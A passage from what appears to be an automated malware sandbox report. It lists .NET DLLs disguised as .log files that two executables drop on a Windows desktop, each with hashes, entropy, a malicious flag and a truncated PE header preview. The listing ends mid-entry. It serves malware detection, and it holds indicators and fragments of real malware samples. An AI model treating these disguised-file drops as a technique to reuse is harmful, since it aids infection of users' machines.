SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hUZevebs.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hXRMEvFO.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\hfHcbqAm.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\iGwCTAyR.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\iIdmhsXq.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iOIEHOMQ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iSLkMDwk.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ifVUOvZl.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\jEubeWaS.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jZEuaeKK.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kFEuCsml.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\laJtiVqg.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lbqdvNOF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lejLFetb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lkPRlAvL.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\luItGIOF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lznUObWJ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mBGMFuin.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mGJtKjSH.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\miMCrVKD.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nONBTjme.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nuOBvxNF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nvvlJpme.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
